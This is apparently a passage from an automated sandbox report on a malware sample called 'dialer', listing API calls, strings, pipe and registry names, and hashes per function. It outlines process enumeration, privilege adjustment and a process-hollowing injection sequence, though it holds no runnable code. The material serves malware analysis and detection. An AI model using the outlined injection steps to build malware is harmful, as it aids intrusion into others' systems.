sleeppipefileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF744DD1C64: AllocateAndInitializeSid.ADVAPI32 ref: 00007FF744DD1CB3
Part of subcall function 00007FF744DD1C64: SetEntriesInAclW.ADVAPI32 ref: 00007FF744DD1D14
Part of subcall function 00007FF744DD1C64: LocalAlloc.KERNEL32 ref: 00007FF744DD1D24
Part of subcall function 00007FF744DD1C64: InitializeSecurityDescriptor.ADVAPI32 ref: 00007FF744DD1D3A
Part of subcall function 00007FF744DD1C64: SetSecurityDescriptorDacl.ADVAPI32 ref: 00007FF744DD1D52
Part of subcall function 00007FF744DD1C64: CreateNamedPipeW.KERNELBASE ref: 00007FF744DD1D94

Sleep.KERNEL32 ref: 00007FF744DD22B1
ConnectNamedPipe.KERNELBASE ref: 00007FF744DD22BE
ReadFile.KERNEL32 ref: 00007FF744DD22E1
Sleep.KERNEL32 ref: 00007FF744DD2302
DisconnectNamedPipe.KERNEL32 ref: 00007FF744DD230B

Strings

\\.\pipe\dialercontrol_redirect64, xrefs: 00007FF744DD2299

Memory Dump Source

Source File: 00000013.00000002.11738774848.00007FF744DD1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF744DD0000, based on PE: true

Associated: 00000013.00000002.11738686661.00007FF744DD0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000013.00000002.11738840022.00007FF744DD3000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000013.00000002.11738910339.00007FF744DD6000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff744dd0000_dialer.jbxd

Similarity

API ID: NamedPipe$DescriptorInitializeSecuritySleep$AllocAllocateConnectCreateDaclDisconnectEntriesFileLocalRead
String ID: \\.\pipe\dialercontrol_redirect64
API String ID: 2071455217-3440882674
Opcode ID: e726fb2786c7da4def9263b705b77f3199000bde839af328c4a314f779c2dbfb
Instruction ID: 90abea5fc83d3c5e0df026d14a36a4fdee4a06063c6686e271abfa40e1bdb965
Opcode Fuzzy Hash: e726fb2786c7da4def9263b705b77f3199000bde839af328c4a314f779c2dbfb
Instruction Fuzzy Hash: 7E01E5A1A5C642D1FE14BF12E884279E760AF45BA1F944534DF7A025D8CF7CE448AF21

Function 00007FF744DD2CC0 Relevance: 9.1, APIs: 6, Instructions: 58
memorysleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32 ref: 00007FF744DD2CDB
HeapAlloc.KERNEL32 ref: 00007FF744DD2CEF
GetProcessHeap.KERNEL32 ref: 00007FF744DD2CF8
HeapAlloc.KERNEL32 ref: 00007FF744DD2D06
K32EnumProcesses.KERNEL32 ref: 00007FF744DD2D21
Sleep.KERNEL32 ref: 00007FF744DD2D79

Memory Dump Source

Source File: 00000013.00000002.11738774848.00007FF744DD1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF744DD0000, based on PE: true

Associated: 00000013.00000002.11738686661.00007FF744DD0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000013.00000002.11738840022.00007FF744DD3000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000013.00000002.11738910339.00007FF744DD6000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff744dd0000_dialer.jbxd

Similarity

API ID: Heap$AllocProcess$EnumProcessesSleep
String ID:
API String ID: 3676546796-0
Opcode ID: d2e1c125c576b14afbc05c5ef5102f2ffb5d105b10e46613ced4fa4cc78aada4
Instruction ID: 8845aa840413bf38b7ad5d3db304a55859cb53e39091d92f9475bca78214b04c
Opcode Fuzzy Hash: d2e1c125c576b14afbc05c5ef5102f2ffb5d105b10e46613ced4fa4cc78aada4
Instruction Fuzzy Hash: F22192B1A0C602C6EA14FF17E49452AF6A1FB86B80F508038CF5A07768CE3DE444DF90

Function 00007FF744DD17F8 Relevance: 9.1, APIs: 6, Instructions: 55
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32 ref: 00007FF744DD180D
HeapAlloc.KERNEL32 ref: 00007FF744DD181E

Part of subcall function 00007FF744DD14E4: GetProcessHeap.KERNEL32 ref: 00007FF744DD1517
Part of subcall function 00007FF744DD14E4: HeapAlloc.KERNEL32 ref: 00007FF744DD152A
Part of subcall function 00007FF744DD14E4: GetProcessHeap.KERNEL32 ref: 00007FF744DD1538
Part of subcall function 00007FF744DD14E4: HeapAlloc.KERNEL32 ref: 00007FF744DD1549
Part of subcall function 00007FF744DD14E4: K32EnumProcesses.KERNEL32 ref: 00007FF744DD1563
Part of subcall function 00007FF744DD14E4: OpenProcess.KERNEL32 ref: 00007FF744DD1591
Part of subcall function 00007FF744DD14E4: K32EnumProcessModules.KERNEL32 ref: 00007FF744DD15B6
Part of subcall function 00007FF744DD14E4: ReadProcessMemory.KERNELBASE ref: 00007FF744DD15ED
Part of subcall function 00007FF744DD14E4: CloseHandle.KERNELBASE ref: 00007FF744DD1629
Part of subcall function 00007FF744DD14E4: GetProcessHeap.KERNEL32 ref: 00007FF744DD163B
Part of subcall function 00007FF744DD14E4: HeapFree.KERNEL32 ref: 00007FF744DD1649
Part of subcall function 00007FF744DD14E4: GetProcessHeap.KERNEL32 ref: 00007FF744DD164F
Part of subcall function 00007FF744DD14E4: HeapFree.KERNEL32 ref: 00007FF744DD165D

OpenProcess.KERNEL32 ref: 00007FF744DD1865
TerminateProcess.KERNEL32 ref: 00007FF744DD1878
CloseHandle.KERNEL32 ref: 00007FF744DD1881
GetProcessHeap.KERNEL32 ref: 00007FF744DD1891

Memory Dump Source

Source File: 00000013.00000002.11738774848.00007FF744DD1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF744DD0000, based on PE: true

Associated: 00000013.00000002.11738686661.00007FF744DD0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000013.00000002.11738840022.00007FF744DD3000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000013.00000002.11738910339.00007FF744DD6000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff744dd0000_dialer.jbxd

Similarity

API ID: HeapProcess$Alloc$CloseEnumFreeHandleOpen$MemoryModulesProcessesReadTerminate
String ID:
API String ID: 1323846700-0
Opcode ID: 5cc818aebe366c74c24883c76324c687b53e60aeb57db289d72e63b86dd9db26
Instruction ID: ce58bd3867ca54975a9415049079348999ac022cbaeefb9467028a41e7223a0a
Opcode Fuzzy Hash: 5cc818aebe366c74c24883c76324c687b53e60aeb57db289d72e63b86dd9db26
Instruction Fuzzy Hash: F4115CA1E0D642D6EF18FF67A880169A7A1EF8DB91F888034DF1D03759DE3DD4459B10

Function 00007FF744DD19AC Relevance: 4.5, APIs: 3, Instructions: 30
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OpenProcess.KERNEL32(?,?,?,00007FF744DD110E), ref: 00007FF744DD19CA
IsWow64Process.KERNEL32(?,?,?,00007FF744DD110E), ref: 00007FF744DD19E0
CloseHandle.KERNELBASE(?,?,?,00007FF744DD110E), ref: 00007FF744DD19FB

Memory Dump Source

Source File: 00000013.00000002.11738774848.00007FF744DD1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF744DD0000, based on PE: true

Associated: 00000013.00000002.11738686661.00007FF744DD0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000013.00000002.11738840022.00007FF744DD3000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000013.00000002.11738910339.00007FF744DD6000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff744dd0000_dialer.jbxd

Similarity

API ID: Process$CloseHandleOpenWow64
String ID:
API String ID: 10462204-0
Opcode ID: ea685a94494dd3c72d9a5f52f0d7d3242b8d37645b818c6e37f69502b31e9c88
Instruction ID: 51644dd872573e2f8c14d154f90ec9829cc406e73a98d0f5874200aa17a27d13
Opcode Fuzzy Hash: ea685a94494dd3c72d9a5f52f0d7d3242b8d37645b818c6e37f69502b31e9c88
Instruction Fuzzy Hash: 92F04961B0878382EB14AF17B484129A2A0FB8CBC1F849038EFAD4374CDE3CD4458B10

Function 00007FF744DD2314 Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF744DD2328: VerSetConditionMask.NTDLL ref: 00007FF744DD2397
Part of subcall function 00007FF744DD2328: VerSetConditionMask.NTDLL ref: 00007FF744DD23A8
Part of subcall function 00007FF744DD2328: VerSetConditionMask.NTDLL ref: 00007FF744DD23B9
Part of subcall function 00007FF744DD2328: VerifyVersionInfoW.KERNEL32 ref: 00007FF744DD23CC
Part of subcall function 00007FF744DD2328: GetCurrentProcessId.KERNEL32 ref: 00007FF744DD23DE
Part of subcall function 00007FF744DD2328: OpenProcess.KERNEL32 ref: 00007FF744DD23EE
Part of subcall function 00007FF744DD2328: OpenProcessToken.ADVAPI32 ref: 00007FF744DD240F
Part of subcall function 00007FF744DD2328: LookupPrivilegeValueW.ADVAPI32 ref: 00007FF744DD2429
Part of subcall function 00007FF744DD2328: AdjustTokenPrivileges.KERNELBASE ref: 00007FF744DD246D
Part of subcall function 00007FF744DD2328: GetLastError.KERNEL32 ref: 00007FF744DD2477
Part of subcall function 00007FF744DD2328: CloseHandle.KERNELBASE ref: 00007FF744DD2480
Part of subcall function 00007FF744DD2328: FindResourceExA.KERNEL32 ref: 00007FF744DD2494
Part of subcall function 00007FF744DD2328: SizeofResource.KERNEL32 ref: 00007FF744DD24AB
Part of subcall function 00007FF744DD2328: LoadResource.KERNEL32 ref: 00007FF744DD24C4
Part of subcall function 00007FF744DD2328: LockResource.KERNEL32 ref: 00007FF744DD24D6
Part of subcall function 00007FF744DD2328: GetCurrentProcessId.KERNEL32 ref: 00007FF744DD24E3

ExitProcess.KERNEL32 ref: 00007FF744DD231F

Memory Dump Source

Source File: 00000013.00000002.11738774848.00007FF744DD1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF744DD0000, based on PE: true

Associated: 00000013.00000002.11738686661.00007FF744DD0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000013.00000002.11738840022.00007FF744DD3000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000013.00000002.11738910339.00007FF744DD6000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff744dd0000_dialer.jbxd

Similarity

API ID: Process$Resource$ConditionMask$CurrentOpenToken$AdjustCloseErrorExitFindHandleInfoLastLoadLockLookupPrivilegePrivilegesSizeofValueVerifyVersion
String ID:
API String ID: 2329183550-0
Opcode ID: c424f5b466816f57c667fdb355f9c01d35ce1647c2c5f950e20106d890b0f394
Instruction ID: 0ff292d4c4da59528f3002a8048f89289706b8a14240f301073b5da1d0ace4b3
Opcode Fuzzy Hash: c424f5b466816f57c667fdb355f9c01d35ce1647c2c5f950e20106d890b0f394
Instruction Fuzzy Hash: 37A01240E0C143C2ED043F72148502C80601F45201BC00434C51501145CD1C20041B31

Non-executed Functions

Function 00007FF744DD26E8 Relevance: 47.5, APIs: 24, Strings: 3, Instructions: 292
memoryregistryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadFile.KERNEL32 ref: 00007FF744DD276B

Part of subcall function 00007FF744DD19AC: OpenProcess.KERNEL32(?,?,?,00007FF744DD110E), ref: 00007FF744DD19CA
Part of subcall function 00007FF744DD19AC: IsWow64Process.KERNEL32(?,?,?,00007FF744DD110E), ref: 00007FF744DD19E0
Part of subcall function 00007FF744DD19AC: CloseHandle.KERNELBASE(?,?,?,00007FF744DD110E), ref: 00007FF744DD19FB

Part of subcall function 00007FF744DD10C0: OpenProcess.KERNEL32 ref: 00007FF744DD112C
Part of subcall function 00007FF744DD10C0: OpenProcess.KERNEL32 ref: 00007FF744DD114B
Part of subcall function 00007FF744DD10C0: K32GetModuleFileNameExW.KERNEL32 ref: 00007FF744DD1170
Part of subcall function 00007FF744DD10C0: PathFindFileNameW.SHLWAPI ref: 00007FF744DD117E
Part of subcall function 00007FF744DD10C0: lstrlenW.KERNEL32 ref: 00007FF744DD118A
Part of subcall function 00007FF744DD10C0: StrCpyW.SHLWAPI ref: 00007FF744DD11A1
Part of subcall function 00007FF744DD10C0: CloseHandle.KERNEL32 ref: 00007FF744DD11AD
Part of subcall function 00007FF744DD10C0: StrCmpIW.SHLWAPI ref: 00007FF744DD11ED
Part of subcall function 00007FF744DD10C0: NtQueryInformationProcess.NTDLL ref: 00007FF744DD1221
Part of subcall function 00007FF744DD10C0: OpenProcessToken.ADVAPI32 ref: 00007FF744DD124B

RegOpenKeyExW.ADVAPI32 ref: 00007FF744DD2807
RegDeleteValueW.ADVAPI32 ref: 00007FF744DD281F
ExitProcess.KERNEL32 ref: 00007FF744DD2843
GetProcessHeap.KERNEL32 ref: 00007FF744DD284A
HeapAlloc.KERNEL32 ref: 00007FF744DD285D
K32EnumProcesses.KERNEL32 ref: 00007FF744DD287A
ExitProcess.KERNEL32 ref: 00007FF744DD291A

Strings

dialerstager, xrefs: 00007FF744DD2818
SOFTWARE, xrefs: 00007FF744DD27F9
open, xrefs: 00007FF744DD2AEC

Memory Dump Source

Source File: 00000013.00000002.11738774848.00007FF744DD1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF744DD0000, based on PE: true

Associated: 00000013.00000002.11738686661.00007FF744DD0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000013.00000002.11738840022.00007FF744DD3000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000013.00000002.11738910339.00007FF744DD6000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff744dd0000_dialer.jbxd

Similarity

API ID: Process$Open$File$CloseExitHandleHeapName$AllocDeleteEnumFindInformationModulePathProcessesQueryReadTokenValueWow64lstrlen
String ID: SOFTWARE$dialerstager$open
API String ID: 3276259517-3931493855
Opcode ID: 57deca5b7dadaa8d94473ef24676dfbe4cb0f61227f20ab4b3d1e5920c79bf4c
Instruction ID: 0f3164331afaba38148bf996b05f78796f86f0e9c3220a83185cd369206af037
Opcode Fuzzy Hash: 57deca5b7dadaa8d94473ef24676dfbe4cb0f61227f20ab4b3d1e5920c79bf4c
Instruction Fuzzy Hash: DDD162A1A0C682C6FF75BF2698842F8E2A5FF44744F814135DF2D4669DDE7CA604EB20

Function 00007FF744DD1DB4 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 162
injectionthreadmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNEL32 ref: 00007FF744DD1E78
VirtualAllocEx.KERNEL32 ref: 00007FF744DD1EA7
WriteProcessMemory.KERNEL32 ref: 00007FF744DD1ECC
WriteProcessMemory.KERNEL32 ref: 00007FF744DD1F08
VirtualAlloc.KERNEL32 ref: 00007FF744DD1F3B
GetThreadContext.KERNEL32 ref: 00007FF744DD1F57
WriteProcessMemory.KERNEL32 ref: 00007FF744DD1F7F
SetThreadContext.KERNEL32 ref: 00007FF744DD1F9D
ResumeThread.KERNEL32 ref: 00007FF744DD1FAD
OpenProcess.KERNEL32 ref: 00007FF744DD1FCC
TerminateProcess.KERNEL32 ref: 00007FF744DD1FDC

Strings

@, xrefs: 00007FF744DD1E9F

Memory Dump Source

Source File: 00000013.00000002.11738774848.00007FF744DD1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF744DD0000, based on PE: true

Associated: 00000013.00000002.11738686661.00007FF744DD0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000013.00000002.11738840022.00007FF744DD3000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000013.00000002.11738910339.00007FF744DD6000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff744dd0000_dialer.jbxd

Similarity

API ID: Process$MemoryThreadWrite$AllocContextVirtual$CreateOpenResumeTerminate
String ID: @
API String ID: 3462610200-2766056989
Opcode ID: 703b8677555c06e2b0f299b5c9a482d004feef9bba7614f76242c0c17f04cdf7
Instruction ID: 9cb7e40158daf206b3304f30d658526d57e609201b02fbaae6ff521b849d784f
Opcode Fuzzy Hash: 703b8677555c06e2b0f299b5c9a482d004feef9bba7614f76242c0c17f04cdf7
Instruction Fuzzy Hash: 71618BB2B08A02C6EB54AF66E88066DB7A1FB48B88F804135DF5D57B58DF3CE445DB10

Function 00007FF744DD1AC4 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 106memorycomCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32 ref: 00007FF744DD1AEB
SysAllocString.OLEAUT32 ref: 00007FF744DD1AFB
CoInitializeEx.OLE32 ref: 00007FF744DD1B08
CoInitializeSecurity.OLE32 ref: 00007FF744DD1B3F
CoCreateInstance.OLE32 ref: 00007FF744DD1B84
VariantInit.OLEAUT32 ref: 00007FF744DD1B96
CoUninitialize.OLE32 ref: 00007FF744DD1C2F
SysFreeString.OLEAUT32 ref: 00007FF744DD1C38
SysFreeString.OLEAUT32 ref: 00007FF744DD1C41

Strings

dialersvc64, xrefs: 00007FF744DD1AE2

Memory Dump Source

Source File: 00000013.00000002.11738774848.00007FF744DD1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF744DD0000, based on PE: true

Associated: 00000013.00000002.11738686661.00007FF744DD0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000013.00000002.11738840022.00007FF744DD3000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000013.00000002.11738910339.00007FF744DD6000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff744dd0000_dialer.jbxd

Similarity

API ID: String$AllocFreeInitialize$CreateInitInstanceSecurityUninitializeVariant
String ID: dialersvc64
API String ID: 4184240511-3881820561
Opcode ID: 1cf1482e3e3cd0594537fe81606e3316bc30941842e87169c6508401709d1003
Instruction ID: 0c03f8efc8a49175dc3be8dedb78db821271f0a9f51ed1e9062ce521a9487c62
Opcode Fuzzy Hash: 1cf1482e3e3cd0594537fe81606e3316bc30941842e87169c6508401709d1003
Instruction Fuzzy Hash: D4415E72B08B46D6EB10AF26D8842ADB7B5FB89B89B444135DF1D47A28DF3CE149C710

Function 00007FF744DD1000 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 37registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32 ref: 00007FF744DD1034
RegDeleteKeyW.ADVAPI32 ref: 00007FF744DD1045
RegEnumKeyExW.ADVAPI32 ref: 00007FF744DD1082
RegCloseKey.ADVAPI32 ref: 00007FF744DD1093
RegDeleteKeyExW.ADVAPI32 ref: 00007FF744DD10B0

Strings

SOFTWARE\dialerconfig, xrefs: 00007FF744DD1026, 00007FF744DD109C

Memory Dump Source

Source File: 00000013.00000002.11738774848.00007FF744DD1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF744DD0000, based on PE: true

Associated: 00000013.00000002.11738686661.00007FF744DD0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000013.00000002.11738840022.00007FF744DD3000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000013.00000002.11738910339.00007FF744DD6000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff744dd0000_dialer.jbxd

Similarity

API ID: Delete$CloseEnumOpen
String ID: SOFTWARE\dialerconfig
API String ID: 3013565938-461861421
Opcode ID: e1473c9d781940c188c1c4810ff800916bd5dc84dd697936dace2937510ea816
Instruction ID: 6f78f3f51b98cfd89397fafc664e0b23e20c9be6866b05c0db313a30545d2b5c
Opcode Fuzzy Hash: e1473c9d781940c188c1c4810ff800916bd5dc84dd697936dace2937510ea816
Instruction Fuzzy Hash: 53118662B1CA85C1EB60BF25E8847B96364FB48758F804235DB5D0659CCF3CD148DF24

Function 00007FF744DD2C18 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 42fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32 ref: 00007FF744DD2C53
WriteFile.KERNEL32 ref: 00007FF744DD2C7B
WriteFile.KERNEL32 ref: 00007FF744DD2C9E
CloseHandle.KERNEL32 ref: 00007FF744DD2CA7

Strings

\\.\pipe\dialercontrol_redirect64, xrefs: 00007FF744DD2C30

Memory Dump Source

Source File: 00000013.00000002.11738774848.00007FF744DD1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF744DD0000, based on PE: true

Associated: 00000013.00000002.11738686661.00007FF744DD0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000013.00000002.11738840022.00007FF744DD3000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000013.00000002.11738910339.00007FF744DD6000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff744dd0000_dialer.jbxd

Similarity

API ID: File$Write$CloseCreateHandle
String ID: \\.\pipe\dialercontrol_redirect64
API String ID: 148219782-3440882674
Opcode ID: e51fa25a04711743f107767099e23b895b2e502b334cde0a5e9bfd5133e6eec8
Instruction ID: 10a480eaf909f46ed61b80a6c448e0b6d92d6f2dc317337959db4e043651fb05
Opcode Fuzzy Hash: e51fa25a04711743f107767099e23b895b2e502b334cde0a5e9bfd5133e6eec8
Instruction Fuzzy Hash: 131151B6B1875182FB10AF16E448329E760FB88BA4F844235DF2903B98CF7CD505CB50

Function 00007FF744DD1A14 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,?,00000000,00007FF744DD1914), ref: 00007FF744DD1A24
GetProcAddress.KERNEL32(?,?,00000000,00007FF744DD1914), ref: 00007FF744DD1A37

Strings

ntdll.dll, xrefs: 00007FF744DD1A1A

Memory Dump Source

Source File: 00000013.00000002.11738774848.00007FF744DD1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF744DD0000, based on PE: true

Associated: 00000013.00000002.11738686661.00007FF744DD0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000013.00000002.11738840022.00007FF744DD3000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000013.00000002.11738910339.00007FF744DD6000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff744dd0000_dialer.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: ntdll.dll
API String ID: 1646373207-2227199552
Opcode ID: 2932c76e980009a225b48c98ed69798072b802092a4ae1a9bffd161348126381
Instruction ID: 278d3e32d034f16ee11d6845583e37071438015513df5d0ed7226aacab1b85e9
Opcode Fuzzy Hash: 2932c76e980009a225b48c98ed69798072b802092a4ae1a9bffd161348126381
Instruction Fuzzy Hash: 3BD0C9D4F1E603C2EE19BFA7A8D51749395AF5CB85BC85430CE3E46358DE2CD0999A20

Analysis Process: powershell.exePID: 8508, Parent PID: 5028COMMON

Executed Functions

Function 00007FF95A533518 Relevance: 3.0, Strings: 2, Instructions: 544COMMON

Download Yara Rule

Strings

PXqZ, xrefs: 00007FF95A533949
VqZ, xrefs: 00007FF95A533808

Memory Dump Source

Source File: 00000015.00000002.11648808286.00007FF95A530000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF95A530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff95a530000_powershell.jbxd

Similarity

API ID:
String ID: PXqZ$VqZ
API String ID: 0-3993013737
Opcode ID: 58bfeecae3f7c405cf263628f8d62d2de318c4ae5d08fdb4d2e8bc698b059fce
Instruction ID: 07ab21f1c06643f76439a7c930ba2349c66bc48b0aa4e6e151ede48611b7eb15
Opcode Fuzzy Hash: 58bfeecae3f7c405cf263628f8d62d2de318c4ae5d08fdb4d2e8bc698b059fce
Instruction Fuzzy Hash: 5802C031A0CA4A8FEB94EF5CD485EFD7BE1EF95320F1801BAD109D7186DA75B8468780

Function 00007FF95A604943 Relevance: .2, Instructions: 182COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.11649541546.00007FF95A600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF95A600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff95a600000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f44bb0a59ae3957238f6a35258bdbf185853a948c520ef791124e059f34e5ec3
Instruction ID: 5403e9505965d97f5e0262de74fb0ea32267da95d17a1bbcfa12b68641c46fd9
Opcode Fuzzy Hash: f44bb0a59ae3957238f6a35258bdbf185853a948c520ef791124e059f34e5ec3
Instruction Fuzzy Hash: 6951FF32E0DA460FEBA5DB1C94553B477D1FF84620B4801FAC24EC329BDE65F885828D

Function 00007FF95A53A0E5 Relevance: .1, Instructions: 130COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.11648808286.00007FF95A530000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF95A530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff95a530000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e6a8a1fccee84567f5f1b73f216121859378956d93cd49f92dca775da29cc5bd
Instruction ID: fccf516aed1cb3f197c4936c56eee5cc9a493339fe7aa5635168a4a8b84b7cd5
Opcode Fuzzy Hash: e6a8a1fccee84567f5f1b73f216121859378956d93cd49f92dca775da29cc5bd
Instruction Fuzzy Hash: D831283191CB884FDB58DF5CA84A6A87BE0FB99320F00426FE449D3252DB71A855CBC2

Function 00007FF95A41ED40 Relevance: .1, Instructions: 127COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.11647775829.00007FF95A41D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF95A41D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff95a41d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5213a1fb0b77da9404c5d0b26b6f3acd8c5d12e5f4aa8bcbe00184c14cdd790e
Instruction ID: 242b0196b6af598dc269ecb840ca75ef550a1181fd226c2f0402cd46171f90f6
Opcode Fuzzy Hash: 5213a1fb0b77da9404c5d0b26b6f3acd8c5d12e5f4aa8bcbe00184c14cdd790e
Instruction Fuzzy Hash: A141E73040DBC45FD756DB299C46A623FF0EF67220F1945DFD088CB1A3D625A846C792

Function 00007FF95A53B028 Relevance: .1, Instructions: 103COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.11648808286.00007FF95A530000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF95A530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff95a530000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f44e2c50f57d475d311a47254c423f40713acfc3e612fd4b96531b42f44eb877
Instruction ID: 0e2488b65edb031550ab5b0545e24fa46b68cfb221c9239526a539f3d101aed8
Opcode Fuzzy Hash: f44e2c50f57d475d311a47254c423f40713acfc3e612fd4b96531b42f44eb877
Instruction Fuzzy Hash: 9021073190CB4C4FDB59DFAC984A7E97BE0EB96321F04826FD04CC3152DA75A45ACB92

Function 00007FF95A60498F Relevance: .1, Instructions: 95COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.11649541546.00007FF95A600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF95A600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff95a600000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c4325a5498a51c5dcb6f60cf2f8ea4543726232defd922a327934a1363739fee
Instruction ID: ac9b0055e7b541a4f9f992143f792522413ffc0b335ae97318a1e4ae2a56b1c3
Opcode Fuzzy Hash: c4325a5498a51c5dcb6f60cf2f8ea4543726232defd922a327934a1363739fee
Instruction Fuzzy Hash: 95219A22E0EA464FE7B5DB0C949827427D1FF55720B4901FAC24EC71AADE59FC84824D

Function 00007FF95A534675 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.11648808286.00007FF95A530000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF95A530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff95a530000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5d3de781b6e1c1d351980934f9f8787e9cc24ca28914612d81c9f729411c0c92
Instruction ID: 37b9fecd97e1dd0952008476a72b52ab80cc2f8e6d43ceb0f53cc3092a2286e0
Opcode Fuzzy Hash: 5d3de781b6e1c1d351980934f9f8787e9cc24ca28914612d81c9f729411c0c92
Instruction Fuzzy Hash: BA01677111CB0C4FD744EF4CE451AA9B7E0FF95364F10056EE58AC3652D636E882CB45

Function 00007FF95A53AE68 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.11648808286.00007FF95A530000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF95A530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff95a530000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
